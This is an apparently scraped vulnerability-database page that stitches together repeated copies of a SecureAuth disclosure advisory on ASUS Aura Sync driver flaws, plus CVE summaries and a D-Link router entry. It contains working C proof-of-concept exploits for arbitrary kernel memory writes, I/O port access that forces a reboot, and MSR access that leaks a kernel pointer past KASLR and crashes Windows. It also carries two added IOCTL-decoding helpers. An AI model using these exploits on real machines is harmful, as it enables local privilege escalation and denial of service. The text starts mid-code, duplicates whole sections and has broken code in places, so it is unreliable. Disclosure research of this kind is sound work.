    // Reset control register at port 0xCF9: pulse the system reset bits
    BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
    gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
    Sleep(50);
    gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
    Sleep(50);
}
BOOL InitDriver()
{
    const char *szDeviceNames[] = { "\\\\.\\Asusgio", "\\\\.\\GLCKIo" };
    BYTE i = 0;
    for (i = 0; i < 2; i++) {
        ghDriver = CreateFileA(szDeviceNames[i], GENERIC_READ |
            GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL, NULL);
        if (ghDriver == INVALID_HANDLE_VALUE) {
            printf("Cannot get handle to driver object '%s' - GetLastError:%lu\n",
                szDeviceNames[i], GetLastError());
            continue;
        }
        gConfig.DriverIndex = i + 1;
        // gConfig is zero-initialised, so the copy stays NUL terminated
        strncpy((char *)gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
        break;
    }
    switch (gConfig.DriverIndex) {
    case DriverEnum::ASIO:
        gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB;
        gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB;
        break;
    case DriverEnum::GLCKIO:
        gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB;
        gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB;
        break;
    default:
        break;
    }
    return gConfig.DriverIndex ? TRUE : FALSE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (PMIO access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        return 1;
    }
    printf("DeviceName: '%s' Handle: %08x\n", (char *)gConfig.DeviceName,
        (DWORD)(ULONG_PTR)ghDriver);
    printf("press ENTER for hard reset...");
    getchar();
    Reboot();
    CloseHandle(ghDriver);
    return 0;
}
-----/
*7.3. *MSR Register access**
[CVE-2018-18535]
Asusgio exposes a functionality to read and write Machine Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.
Proof of Concept:
/-----
// This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR
// register value (leaks a kernel function pointer bypassing KASLR) and
// then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
// for \\.\Asusgio
#define IOCTL_ASIO_RDMSR 0xA0406458
#define IOCTL_ASIO_WRMSR 0xA040A45C
HANDLE ghDriver = 0;
#pragma pack (push,1)
// MSR request: 'reg' selects the MSR; only the first 4 bytes are sent for
// a read, the full 12 bytes (reg + value) for a write
typedef struct _ASIO_MSRIO_STRUCT {
    DWORD reg;
    ULONG64 value;
} ASIO_MSRIO_STRUCT;
#pragma pack(pop)
// Expands inside a function that has already declared 'inbuffer';
// the first 8 bytes the driver writes back are returned to the caller.
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, iocontrolcode, (LPVOID)&inbuffer, \
        size, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];

ULONG64 ASIO_RDMSR(DWORD reg)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg };
    IOCTLMACRO(IOCTL_ASIO_RDMSR, 4)
}
ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg, value };
    IOCTLMACRO(IOCTL_ASIO_WRMSR, 12)
}
BOOL InitDriver()
{
    ghDriver = CreateFileA("\\\\.\\Asusgio", GENERIC_READ |
        GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object '%s' - GetLastError:%lu\n",
            "\\\\.\\Asusgio", GetLastError());
        return FALSE;
    }
    return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (MSR access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        return 1;
    }
    ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);
    printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR);
    printf("press ENTER for instant BSOD\n");
    getchar();
    ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222ULL);
    CloseHandle(ghDriver);
    return 0;
}
-----/
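Added example, not part of the SecureAuth advisory: a decoder for the I/O control codes quoted in the PoCs of sections 7.1 to 7.3, splitting each into the CTL_CODE fields (device type, function, transfer method, required access) a triager checks first when reviewing a driver's IOCTL surface. The only page-derived values are the six IOCTL constants; field names and bit positions follow the Windows CTL_CODE macro.

```c
/* Added example (not from the advisory): decode Windows I/O control codes
 * into the CTL_CODE fields. Bit layout per the Windows CTL_CODE macro:
 *   bits 31..16 DeviceType, bits 15..14 RequiredAccess,
 *   bits 13..2  Function,   bits  1..0 TransferType (method). */
#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint16_t device_type;  /* vendors pick values from 0x8000 upward */
    uint16_t function;     /* 0x800 and above is the vendor-defined range */
    uint8_t  method;       /* 0 buffered, 1 in-direct, 2 out-direct, 3 neither */
    uint8_t  access;       /* 0 any, 1 read, 2 write, 3 read+write */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

/* Inverse of decode_ioctl(); same result as CTL_CODE(type, func, method, access). */
uint32_t encode_ioctl(ioctl_fields f)
{
    return ((uint32_t)f.device_type << 16) |
           ((uint32_t)(f.access & 0x3) << 14) |
           ((uint32_t)(f.function & 0xFFF) << 2) |
           (uint32_t)(f.method & 0x3);
}

const char *method_name(uint8_t method)
{
    static const char *names[4] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                    "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[method & 0x3];
}

const char *access_name(uint8_t access)
{
    static const char *names[4] = { "FILE_ANY_ACCESS", "FILE_READ_ACCESS",
                                    "FILE_WRITE_ACCESS",
                                    "FILE_READ_ACCESS | FILE_WRITE_ACCESS" };
    return names[access & 0x3];
}

/* 1 when the I/O manager passes the request through on any open handle,
 * leaving the driver alone to decide who may use it. */
int ioctl_requires_no_access_right(uint32_t code)
{
    return decode_ioctl(code).access == 0;
}

/* The six control codes quoted in the PoCs of sections 7.1 to 7.3. */
typedef struct { const char *name; uint32_t code; } named_ioctl;
static const named_ioctl page_codes[] = {
    { "IOCTL_GLCKIO_READPORT (VMWRITE path)", 0x80102050u },
    { "IOCTL_GLCKIO_WRITEPORT",              0x80102054u },
    { "IOCTL_ASIO_PORTREADB",                0xA0406400u },
    { "IOCTL_ASIO_PORTWRITEB",               0xA040A440u },
    { "IOCTL_ASIO_RDMSR",                    0xA0406458u },
    { "IOCTL_ASIO_WRMSR",                    0xA040A45Cu },
};
#define PAGE_CODE_COUNT (sizeof(page_codes) / sizeof(page_codes[0]))

/* How many of the page's codes carry no read/write access requirement. */
int count_any_access_codes(void)
{
    int n = 0;
    size_t i;
    for (i = 0; i < PAGE_CODE_COUNT; i++)
        n += ioctl_requires_no_access_right(page_codes[i].code);
    return n;
}

int main(void)
{
    size_t i;
    for (i = 0; i < PAGE_CODE_COUNT; i++) {
        ioctl_fields f = decode_ioctl(page_codes[i].code);
        printf("%-38s 0x%08X  type=0x%04X func=0x%03X %s %s\n",
               page_codes[i].name, page_codes[i].code, f.device_type,
               f.function, method_name(f.method), access_name(f.access));
    }
    printf("%d of %u codes require no access right on the handle\n",
           count_any_access_codes(), (unsigned)PAGE_CODE_COUNT);
    return 0;
}
```

All six codes decode as METHOD_BUFFERED, and the two GLCKIo codes declare FILE_ANY_ACCESS while the Asusgio codes declare read or write access; neither detail is the root cause, since the advisory's point is that the device objects can be opened by any user, so the fix belongs in the device object's DACL and in the handlers' validation of what they are asked to read or write, not in the code bits.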
*8. *Report Timeline**
2017-11-27: SecureAuth sent an initial notification to ASUS, asking for
GPG keys.
2017-12-14: SecureAuth sent a second notification to ASUS.
2018-01-29: SecureAuth sent a third notification to ASUS.
2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report
with technical information.
2018-01-31: SecureAuth sent Asus a draft version of the advisory.
2018-02-07: SecureAuth requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-14: SecureAuth again requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-21: Asus acknowledged SecureAuth's draft report and asked for
time for internal investigations.
2018-02-21: Asus answered saying that they were planning to update Aura
in April.
2018-02-21: SecureAuth thanked Asus for the feedback and requested
regular contact until the Aura update.
2018-03-19: SecureAuth asked for a status update.
2018-03-26: SecureAuth asked for a status update again.
2018-03-26: SecureAuth asked Asus to confirm whether this new version had
already been released.
2018-04-03: SecureAuth requested a status update.
2018-04-16: SecureAuth requested a confirmation from Asus.
2018-04-23: SecureAuth requested a confirmation from Asus again. However, this version didn't address the reported
vulnerabilities. For that reason, SecureAuth requested a clarification
about the case. In this context, SecureAuth requested a new clarification.
2018-07-03: SecureAuth requested a status update.
2018-12-18: Advisory CORE-2017-0012 published as 'user release'.
*9. *References**
[1] https://www.asus.com/support
*10. *About SecureAuth Labs**
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
*11. *About SecureAuth**
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com
*12. *Disclaimer**
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201812-0060 | CVE-2018-18536 | ASUS Aura Sync Vulnerabilities in authorization, authority and access control |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
The GLCKIo and Asusgio low-level drivers in ASUS Aura Sync v1.07.22 and earlier expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. ASUS Aura Sync contains vulnerabilities in authorization, authority, and access control. Information may be acquired, information may be falsified, and a denial-of-service (DoS) condition may result. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities.
Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions.
ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory
| VAR-201812-0061 | CVE-2018-18537 | ASUS Aura Sync Vulnerabilities related to security functions |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
The GLCKIo low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes a path to write an arbitrary DWORD to an arbitrary address. ASUS Aura Sync contains vulnerabilities related to security features. Information may be tampered with.
Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASUS Drivers Elevation of Privilege Vulnerabilities
*1. *Advisory Information**
Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release
*2. *Vulnerability Information**
Class: Exposed IOCTL with Insufficient Access Control [CWE-782],
Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL
with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535
*3. *Vulnerability Description**
ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.
*4. *Vulnerable Packages**
.
*5. *Vendor Information, Solutions and Workarounds**
The vendor did not provide fixes or workaround information.
*6. *Credits**
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.
*7. *Technical Description / Proof of Concept Code**
Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).
The main subject of this advisory are two of the device drivers
installed/loaded by the Aura Sync application. From now on addressed as
"Asusgio" and "GLCKIo". Default installation allows non-privileged user
processes (even running at LOW INTEGRITY) to get a HANDLE and issue
IOCTL codes to these drivers.
The following sections describe the problems found.
*7.1.
/-----
.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:
.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38]
; CONTROLLED VALUE
.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56]
; CONTROLLED VALUE
.text:FFFFF800B09F140A mov [rax], ecx
; Arbitrary DWORD sized write!
.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]
.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4
.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D
-----/
Proof of Concept:
/-----
#include <windows.h>
HANDLE ghDriver = 0;
#define IOCTL_GLCKIO_VMWRITE 0x80102050
typedef struct _STRUCT_GLCKIO_VMWRITE {
WORD unk0;
DWORD unk1_1;
WORD unk1_2;
ULONG64 unk2;
ULONG64 unk3;
ULONG64 unk4;
ULONG64 unk5;
ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;
BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
mystructIn.unk0 = 0xf11;
mystructIn.unk1_1 = value; // value
mystructIn.unk5 = dest; // address
STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };
DWORD returned = 0;
DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut),
&returned, NULL);
return BOOL(returned);
}
BOOL InitDriver()
{
ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n",
GetLastError());
return FALSE;
}
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");
if (!InitDriver()) {
exit(0);
}
printf("press ENTER for instant BSOD\n");
getchar();
ArbitraryWriteDWORD(0, 0xffffffff);
CloseHandle(ghDriver);
return 0;
}
-----/
*7.2. *Port mapped I/O access**
[CVE-2018-18536]
Both GLCKIo and Asusgio expose a functionality to read/write data
from/to IO ports. This could be leveraged in a number of ways to
ultimately run code with elevated privileges.
/-----
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this functionality.
// Compile for 32bit!!! Asusgio apparently has a bug preventing this
// functionality to work unless IoIs32bitProcess == TRUE. They set rdx
// as a pointer instead of a port number on the in/out instruction...
// and they ONLY do this incorrectly in the x64 process specific code.(!?)
#include "stdafx.h"
#include <windows.h>
// for \\.\glckio
#define IOCTL_GLCKIO_WRITEPORT 0x80102054
#define IOCTL_GLCKIO_READPORT 0x80102050
// for \\.\Asusgio
#define IOCTL_ASIO_PORTREADB 0xA0406400
#define IOCTL_ASIO_PORTWRITEB 0xA040A440
HANDLE ghDriver = 0;
typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);
#pragma pack (push,1)
typedef struct {
DWORD DriverIndex; // DriverEnum index
BYTE DeviceName[MAX_PATH];
fnPMIOReadB pPMIOReadB;
fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;
AutoConfigStruct gConfig = { 0 };
enum DriverEnum {
ASIO = 1,
GLCKIO,
};
typedef struct _ASIO_PORTIO_STRUCT {
DWORD port;
ULONG64 value;
} ASIO_PORTIO_STRUCT;
typedef struct _GLCKIO_PORTIO_STRUCT {
WORD port;
DWORD value;
DWORD datalen;
} GLCKIO_PORTIO_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
BYTE outbuffer[0x30] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer,
##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[0]; \
BYTE GLCKIO_PMIOReadB(WORD port)
{
GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1};
IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10)
}
BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value)
{
GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 };
IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10)
}
BYTE ASIO_PMIOReadB(WORD port)
{
ASIO_PORTIO_STRUCT inbuffer = { port, 0 };
IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4)
}
BYTE ASIO_PMIOWriteB(WORD port, BYTE value)
{
ASIO_PORTIO_STRUCT inbuffer = { port, value };
IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5)
}
void Reboot()
{
BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
Sleep(50);
gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
Sleep(50);
}
BOOL InitDriver()
{
char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" };
BYTE i = 0;
for (i = 0; i<2; i++) {
ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ |
GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'-
GetLastError:%d\n", szDeviceNames[i], GetLastError());
continue;
}
gConfig.DriverIndex = i+1;
memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);
break;
}
switch (gConfig.DriverIndex) {
case DriverEnum::ASIO:
{
gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB;
gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB;
}
break;
case DriverEnum::GLCKIO:
{
gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB;
}
gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB;
break;
default:
break;
}
return gConfig.DriverIndex ? TRUE : FALSE;
}
int _tmain(int argc, _TCHAR* argv[])
{
printf("ASUS Aura Sync PoC (PMIO access)\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName,
(DWORD)ghDriver);
printf("press ENTER for hard reset...");
getchar();
Reboot();
CloseHandle(ghDriver);
}
-----/
*7.3. *MSR Register access**
[CVE-2018-18535]
Asusgio exposes a functionality to read and write Machine Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.
Proof of Concept:
/-----
// This PoC demonstrates insecure access to MSRs by reading the IA32_LSTAR
// register value (leaks a kernel function pointer, bypassing KASLR) and
// then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
// IOCTL codes for \\.\Asusgio
#define IOCTL_ASIO_RDMSR 0xA0406458
#define IOCTL_ASIO_WRMSR 0xA040A45C
HANDLE ghDriver = 0;
// Input buffer layout expected by the driver: 4-byte MSR index followed
// by the 8-byte value, packed without padding.
#pragma pack (push,1)
typedef struct _ASIO_MSRIO_STRUCT {
    DWORD reg;
    ULONG64 value;
} ASIO_MSRIO_STRUCT;
#pragma pack(pop)
// Sends 'inbuffer' (declared by the caller) to the driver and returns the
// first 8 bytes of the output buffer.
#define IOCTLMACRO(iocontrolcode, size) \
    ULONG64 outbuffer[2] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, iocontrolcode, (LPVOID)&inbuffer, size, \
                    (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0];
ULONG64 ASIO_RDMSR(DWORD reg)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg };
    IOCTLMACRO(IOCTL_ASIO_RDMSR, 4)
}
ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value)
{
    ASIO_MSRIO_STRUCT inbuffer = { reg, value };
    IOCTLMACRO(IOCTL_ASIO_WRMSR, 12)
}
BOOL InitDriver()
{
    ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\' - GetLastError:%d\n",
               "\\\\.\\Asusgio", GetLastError());
        return FALSE;
    }
    return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (MSR access)\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);
    printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR);
    printf("press ENTER for instant BSOD\n");
    getchar();
    // Return value is not meaningful after the write; the machine crashes.
    ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
    CloseHandle(ghDriver);
    return 0;
}
-----/
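The two IOCTL codes used by the PoC above encode, in their low 16 bits, the transfer method and the access the I/O manager requires of the caller's handle. The decoder below is an added example, not part of the SecureAuth advisory or of ASUS's code: it inverts the WDK's CTL_CODE() layout for the constants quoted above and makes a point relevant to reviewing any such driver: the FILE_READ_ACCESS/FILE_WRITE_ACCESS bits only require that the handle was opened for reading or writing, which the PoC's CreateFile call with GENERIC_READ | GENERIC_WRITE satisfies for every user the device object's DACL lets open it. The enum names mirror the WDK definitions; handle_can_issue is a hypothetical model of that check, not a Windows API.

```c
/* Added example: decode Windows IOCTL codes field by field.
 * CTL_CODE(DeviceType, Function, Method, Access) =
 *     (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
 * so the inverse is a matter of shifting and masking. */
#include <stdint.h>
#include <stdio.h>

/* IOCTL values taken from the advisory's PoC. */
#define IOCTL_ASIO_RDMSR 0xA0406458u
#define IOCTL_ASIO_WRMSR 0xA040A45Cu

/* Access and transfer-method encodings as defined in the WDK. */
enum { FILE_ANY_ACCESS = 0, FILE_READ_ACCESS = 1, FILE_WRITE_ACCESS = 2 };
enum { METHOD_BUFFERED = 0, METHOD_IN_DIRECT = 1,
       METHOD_OUT_DIRECT = 2, METHOD_NEITHER = 3 };

typedef struct {
    uint16_t device_type;  /* bits 31..16 */
    uint16_t function;     /* bits 13..2  */
    uint8_t  access;       /* bits 15..14 */
    uint8_t  method;       /* bits 1..0   */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (uint16_t)((code >> 16) & 0xFFFF);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

/* Microsoft reserves device types below 0x8000 and function codes below
 * 0x800; anything above that is vendor-defined, which is what a driver
 * audit is usually looking for. */
int is_vendor_defined(ioctl_fields f)
{
    return f.device_type >= 0x8000 && f.function >= 0x800;
}

/* Hypothetical model of the I/O manager's access check (not a Windows
 * API): FILE_READ_ACCESS needs a handle opened for reading,
 * FILE_WRITE_ACCESS one opened for writing, FILE_ANY_ACCESS neither.
 * It does not check who the caller is; that is decided only by the
 * device object's DACL when CreateFile opens the device. */
int handle_can_issue(ioctl_fields f, int opened_read, int opened_write)
{
    int ok = 1;
    if (f.access & FILE_READ_ACCESS)  ok = ok && opened_read;
    if (f.access & FILE_WRITE_ACCESS) ok = ok && opened_write;
    return ok;
}

const char *method_name(uint8_t m)
{
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[m & 3];
}

static void describe(const char *label, uint32_t code)
{
    ioctl_fields f = decode_ioctl(code);
    printf("%s = 0x%08X: device 0x%04X function 0x%03X %s access=%u%s\n",
           label, (unsigned)code, f.device_type, f.function,
           method_name(f.method), (unsigned)f.access,
           is_vendor_defined(f) ? " (vendor-defined)" : "");
}

int main(void)
{
    describe("IOCTL_ASIO_RDMSR", IOCTL_ASIO_RDMSR);
    describe("IOCTL_ASIO_WRMSR", IOCTL_ASIO_WRMSR);
    return 0;
}
```

Both codes decode to vendor device type 0xA040, METHOD_BUFFERED, with functions 0x916 (read, FILE_READ_ACCESS) and 0x917 (write, FILE_WRITE_ACCESS). A handle opened read-only would be refused the write IOCTL by the I/O manager but could still issue the read, so the KASLR leak survives that restriction; the effective mitigation is a device DACL that limits who can open the device at all, or removing the MSR IOCTLs from the driver.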
*8. *Report Timeline**
2017-11-27: SecureAuth sent an initial notification to ASUS, asking for
GPG keys.
2017-12-14: SecureAuth sent a second notification to ASUS.
2018-01-29: SecureAuth sent a third notification to ASUS.
2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report
with technical information.
2018-01-31: SecureAuth sent Asus a draft version of the advisory.
2018-02-07: SecureAuth requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-14: SecureAuth again requested an update from Asus regarding the
reported vulnerabilities and a tentative schedule.
2018-02-21: Asus acknowledged SecureAuth's draft report and asked for
time for internal investigations.
2018-02-21: Asus answered saying that they were planning to update Aura
in April.
2018-02-21: SecureAuth thanked Asus for the feedback and requested regular
contact until the Aura update.
2018-03-19: SecureAuth asked for a status update.
2018-03-26: SecureAuth asked for a status update again.
2018-03-26: SecureAuth asked Asus to confirm whether this new version had
already been released.
2018-04-03: SecureAuth requested a status update.
2018-04-16: SecureAuth requested a confirmation from Asus.
2018-04-23: SecureAuth requested a confirmation from Asus again. However,
this version didn't address the reported vulnerabilities. For that reason,
SecureAuth requested a clarification about the case. In this context,
SecureAuth requested a new clarification.
2018-07-03: SecureAuth requested a status update.
2018-12-18: Advisory CORE-2017-0012 published as 'user release'.
*9. *References**
[1] https://www.asus.com/support
*10. *About SecureAuth Labs**
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
*11. *About SecureAuth**
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com.
*12. *Disclaimer**
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201812-0137 | CVE-2018-17777 | D-Link DVA-5592 Authentication vulnerabilities in devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link DVA-5592 A1_WI_20180823 devices. If the PIN of the page "/ui/cbpc/login" is the default Parental Control PIN (0000), it is possible to bypass the login form by editing the path of the cookie "sid" generated by the page. The attacker will have access to the router control panel with administrator privileges. The D-Link DVA-5592 device contains an authentication vulnerability: information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DVA-5592 is a wireless router from D-Link. A security hole exists in the D-Link DVA-5592 using firmware version A1_WI_20180823.